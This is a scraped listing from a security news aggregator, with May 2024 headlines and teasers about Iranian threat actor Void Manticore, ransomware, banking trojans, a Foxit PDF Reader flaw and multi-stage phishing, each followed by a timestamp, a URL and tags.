tracking the activity under the moniker Void Manticore, which is also known as Storm-0842 (formerly DEV-0842) by 2024-05-20T21:35:00+00:00 https://thehackernews.com/2024/05/iranian-mois-linked-hackers-behind.html www.secnews.physaphae.fr/article.php?IdArticle=8503509 False Threat None 2.0000000000000000 DarkTrace - DarkTrace: AI-based detection Ransomware As A Service Threat | Eking Targets Government Discover how Eking ransomware targeted a government organization in APAC.
Learn about ransomware as a service & the cyber AI technology that stopped the threat. 2024-05-20T20:22:11+00:00 https://darktrace.com/blog/ransomware-as-a-service-eking-targets-government-organization www.secnews.physaphae.fr/article.php?IdArticle=8503617 False Ransomware,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) New Linux Backdoor Attacking Linux Users Via Installation Packages 2024-05-20T20:03:06+00:00 https://community.riskiq.com/article/cdc0c90f www.secnews.physaphae.fr/article.php?IdArticle=8503644 False Malware,Threat None 2.0000000000000000 knowbe4 - cybersecurity services New Threat Report Finds Nearly 90% of Cyber Threats Involve Social Engineering 2024-05-20T18:55:38+00:00 https://blog.knowbe4.com/nearly-90-of-threats-involve-social-engineering www.secnews.physaphae.fr/article.php?IdArticle=8503558 False Threat,Studies None 3.0000000000000000 Netskope - Netskope is an American software company providing an IT security platform Navigating the Future of Cybersecurity: Top I&O Challenges for the Year Ahead The “I&O Perspectives” blog series features interviews with industry visionaries and experts with roles in product management, consulting, engineering and more.
Our goal is to present different viewpoints and predictions on how organizations’ networking, infrastructure and operations (I&O) are impacted by the current threat landscape, existing networking and cybersecurity tools, as well as implications for […] 2024-05-20T18:55:02+00:00 https://www.netskope.com/blog/navigating-the-future-of-cybersecurity-top-io-challenges-for-the-year-ahead www.secnews.physaphae.fr/article.php?IdArticle=8503557 False Tool,Threat None 2.0000000000000000 The Hacker News - The Hacker News is a hacking news blog (surprising, isn't it?) Foxit PDF Reader Flaw Exploited by Hackers to Deliver Diverse Malware Arsenal Multiple threat actors are weaponizing a design flaw in Foxit PDF Reader to deliver a variety of malware such as Agent Tesla, AsyncRAT, DCRat, NanoCore RAT, NjRAT, Pony, Remcos RAT, and XWorm. "This exploit triggers security warnings that could deceive unsuspecting users into executing harmful commands," Check Point said in a technical report. "This exploit has been used by multiple 2024-05-20T17:50:00+00:00 https://thehackernews.com/2024/05/foxit-pdf-reader-flaw-exploited-by.html www.secnews.physaphae.fr/article.php?IdArticle=8503379 False Malware,Threat,Technical None 2.0000000000000000 Dragos - CTI Society Traversing the 2023 Operational Technology Cyber Threat Landscape Information provided here is sourced from Dragos OT Cyber Threat Intelligence adversary hunters and analysts who conduct research on adversary... The post Traversing the 2023 Operational Technology Cyber Threat Landscape first appeared on Dragos.
2024-05-20T15:00:00+00:00 https://www.dragos.com/blog/traversing-the-2023-operational-technology-cyber-threat-landscape/ www.secnews.physaphae.fr/article.php?IdArticle=8503447 False Threat,Industrial None 4.0000000000000000
The Hacker News - The Hacker News is a hacking news blog (surprising, isn't it?) Cyber Criminals Exploit GitHub and FileZilla to Deliver Cocktail Malware A "multi-faceted campaign" has been observed abusing legitimate services like GitHub and FileZilla to deliver an array of stealer malware and banking trojans such as Atomic (aka AMOS), Vidar, Lumma (aka LummaC2), and Octo by impersonating credible software like 1Password, Bartender 5, and Pixelmator Pro. "The presence of multiple malware variants suggests a broad cross-platform targeting 2024-05-20T14:56:00+00:00 https://thehackernews.com/2024/05/cyber-criminals-exploit-github-and.html www.secnews.physaphae.fr/article.php?IdArticle=8503323 False Malware,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Weekly OSINT Highlights, 20 May 2024 2024-05-20T14:19:33+00:00 https://community.riskiq.com/article/8374cff8 www.secnews.physaphae.fr/article.php?IdArticle=8503469 False Ransomware,Malware,Tool,Vulnerability,Threat,Medical None 2.0000000000000000 Recorded Future - Recorded Future feed New 'Siren' mailing list aims to share threat intelligence for open source projects 2024-05-20T14:18:17+00:00 https://therecord.media/openssf-siren-open-source-threat-intelligence-mailing-list www.secnews.physaphae.fr/article.php?IdArticle=8503450 False Threat None 2.0000000000000000 Checkpoint - Security hardware vendor Unveiling Void Manticore: Structured Collaboration Between Espionage and Destruction in MOIS Check Point Research (CPR) has been actively monitoring the activities of Void Manticore, an Iranian threat actor affiliated with the Ministry of Intelligence and Security (MOIS). This threat actor has garnered attention for its involvement in destructive wiping attacks, often coupled with influence operations. Notably, Void Manticore has adopted various online personas to carry out its operations, with the most prominent ones being "Homeland Justice" for attacks in Albania and "Karma" for operations targeting Israel. Key Highlights: Void Manticore, linked to the Iranian Ministry of Intelligence and Security (MOIS), executes destructive wiping attacks alongside influence operations. Operating under various online […]
2024-05-20T13:00:56+00:00 https://blog.checkpoint.com/research/unveiling-void-manticore-structured-collaboration-between-espionage-and-destruction-in-mois/ www.secnews.physaphae.fr/article.php?IdArticle=8503374 False Threat None 2.0000000000000000
Checkpoint - Security hardware vendor Implement a Continuous Threat Exposure Management (CTEM) Program with Check Point IGS Consulting Services In today's constantly evolving threat landscape, it is more important than ever to have a strong security posture in place. Threat actors are becoming more sophisticated and are increasing their rate of attacks: according to Check Point Research, cyber attacks increased 28% in Q1 2024. Many organizations rely on their CISOs to understand the risks and threats to which they could be exposed, but this is becoming an increasingly challenging task as they are also tasked with enabling the business. This means that having an easy way to view and analyze cyber security metrics is essential for CISOs to […]
2024-05-20T13:00:38+00:00 https://blog.checkpoint.com/infinity-global-services/implement-a-continuous-threat-exposure-management-ctem-program-with-check-point-igs-consulting-services/ www.secnews.physaphae.fr/article.php?IdArticle=8503375 False Threat None 2.0000000000000000
Checkpoint Research - Security hardware vendor 20th May – Threat Intelligence Report For the latest discoveries in cyber research for the week of 20th May, please download our Threat_Intelligence Bulletin. TOP ATTACKS AND BREACHES Australian electronic prescriptions provider MediSecure suffered a significant ransomware attack, leading to widespread disruptions and data breaches. The impact of the attack has been profound, broadly affecting healthcare data in the country. […]
2024-05-20T10:46:02+00:00 https://research.checkpoint.com/2024/20th-may-threat-intelligence-report/ www.secnews.physaphae.fr/article.php?IdArticle=8503322 False Ransomware,Threat,Medical None 2.0000000000000000
Checkpoint Research - Security hardware vendor Bad Karma, No Justice: Void Manticore Destructive Activities in Israel Introduction Since October 2023, Check Point Research (CPR) has actively monitored and hunted state-sponsored threats targeting Israeli organizations with destructive attacks using wipers and ransomware. Among these threats, Void Manticore (aka Storm-842) stands out as an Iranian threat actor known for conducting destructive attacks and leaking information through the online persona 'Karma' (sometimes written as KarMa). […]
2024-05-20T10:01:00+00:00 https://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/ www.secnews.physaphae.fr/article.php?IdArticle=8503290 False Ransomware,Threat None 2.0000000000000000
AlienVault Lab Blog - AlienVault is a major defensive player in IOCs Dissecting a Multi-stage Phishing Attack. A 2024 risk report states that 94% of organizations fall victim to phishing attacks, and 96% are negatively impacted by them. However, phishing attacks are not only growing in number but are also becoming more sophisticated and successful. This is owing to the modern multi-stage phishing attack, which is common nowadays. The multi-stage phishing attack is a sophisticated and multifaceted technique that increases the likelihood of an attack succeeding. While these attacks are becoming increasingly common, there needs to be more awareness of them. Therefore, to find relevant measures for mitigating these attacks, organizations must gain crucial insights regarding these multifaceted threats, which this blog covers. What is a Multi-stage Phishing Attack? As its name suggests, a multi-stage phishing attack is a complex form of traditional phishing. In a multi-stage setup, the attack relies on several deceptive phases rather than solely on one deceptive email, unlike a traditional phishing attack. All the phases within the multi-stage phishing attack are designed to build trust and gather information about the target over time. Since this approach works discreetly across multiple phases, it allows threat actors to bypass advanced security measures such as residential proxies and phishing detection tools. Multi-stage phishing attacks are a common occurrence in the modern cyber threat landscape. Attackers use this layered tactic to deploy targeted ransomware or to carry out business email compromise (BEC) attacks. Dissecting a multi-stage phishing attack A multi-stage phishing attack is a sophisticated strategy that relies on a sequence of carefully designed steps.
These steps help increase the probability of a successful phishing attack by evading advanced security and detection techniques. A typical multi-stage approach to the attack consists of the following phases: Initial Contact Like any traditional attack, the multi-stage attack starts with the threat actor initiating contact with the target through seemingly innocuous means. These include social media messages, phishing emails, or even physical methods such as USB drops. Establishing Trust After establishing contact with the target, the threat actor builds trust. This often involves impersonating legitimate entities or using communication channels familiar to the target, making it easy for them to fall victim and trust the threat actor. Introducing Complexities As the attack progresses, the threat actor introduces complexities such as CAPTCHAs, QR codes, and steganography to create further layers of deception that make the attack harder to detect. Exploitation The final stage of the attack involves exploiting the target. At this stage, the threat actor could either deploy malware, extract sensitive information, or perform any other malicious activity that might have been the goal of the whole attack. This multi-layered nature of a phishing attack makes it hard to detect through traditional security tools like residential proxies and phishing detection tools. Therefore, it ultimately makes the attack successful. How QR Codes, Captchas, and Steganography Are Used in Layered Phishing Attacks. In a multi-stage phishing attack, QR codes, steganography, and CAPTCHAs are used to overcome security barriers and increase the attack's efficiency.
Here is how each of these elements is used to ensure the attack is successful: QR Codes Quick Response or QR codes have become ubiquitous in various applications since they a 2024-05-20T10:00:00+00:00 https://cybersecurity.att.com/blogs/security-essentials/dissecting-a-multi-stage-phishing-attack www.secnews.physaphae.fr/article.php?IdArticle=8503291 False Ransomware,Malware,Tool,Threat None 2.0000000000000000 Korben - French blogger GPS – The risks of jamming and spoofing explained 2024-05-20T08:08:39+00:00 https://korben.info/gps-risques-brouillage-leurrage-expliques.html www.secnews.physaphae.fr/article.php?IdArticle=8503265 False Threat None 2.0000000000000000 The Hacker News - The Hacker News is a hacking news blog (surprising, isn't it?) Grandoreiro Banking Trojan Resurfaces, Targeting Over 1,500 Banks Worldwide The threat actors behind the Windows-based Grandoreiro banking trojan have returned in a global campaign since March 2024 following a law enforcement takedown in January. The large-scale phishing attacks, likely facilitated by other cybercriminals via a malware-as-a-service (MaaS) model, target over 1,500 banks across the world, spanning more than 60 countries in Central and South 2024-05-19T13:29:00+00:00 https://thehackernews.com/2024/05/grandoreiro-banking-trojan-resurfaces.html www.secnews.physaphae.fr/article.php?IdArticle=8502695 False Threat,Legislation None 3.0000000000000000 The Hacker News - The Hacker News is a hacking news blog (surprising, isn't it?) Kinsing Hacker Group Exploits More Flaws to Expand Botnet for Cryptojacking The cryptojacking group known as Kinsing has demonstrated its ability to continuously evolve and adapt, proving to be a persistent threat by swiftly integrating newly disclosed vulnerabilities into its exploit arsenal and expanding its botnet. The findings come from cloud security firm Aqua, which described the threat actor as actively orchestrating illicit cryptocurrency mining 2024-05-17T22:50:00+00:00 https://thehackernews.com/2024/05/kinsing-hacker-group-exploits-more.html www.secnews.physaphae.fr/article.php?IdArticle=8501763 False Vulnerability,Threat,Cloud None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Email Campaign Distributes LockBit Black Ransomware via Phorpiex Botnet 2024-05-17T19:54:33+00:00 https://community.riskiq.com/article/ce0bf000 www.secnews.physaphae.fr/article.php?IdArticle=8501845 False Ransomware,Tool,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) To the Moon and back(doors): Lunar landing in diplomatic missions 2024-05-17T19:11:34+00:00 https://community.riskiq.com/article/86a682a8 www.secnews.physaphae.fr/article.php?IdArticle=8501846 False Malware,Tool,Threat,Technical None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) From Document to Script: Insides of DarkGate's Campaign 2024-05-17T16:57:23+00:00 https://community.riskiq.com/article/055cd342 www.secnews.physaphae.fr/article.php?IdArticle=8501757 False Malware,Threat,Cloud None 2.0000000000000000 We Live Security - ESET antivirus software publisher The who, where, and how of APT attacks – Week in security with Tony Anscombe This week, ESET experts released several research publications that shine the spotlight on a number of notable campaigns and broader developments on the threat landscape 2024-05-17T16:09:11+00:00 https://www.welivesecurity.com/en/videos/who-where-how-apt-attacks-week-security-tony-anscombe/ www.secnews.physaphae.fr/article.php?IdArticle=8502147 False Threat None 3.0000000000000000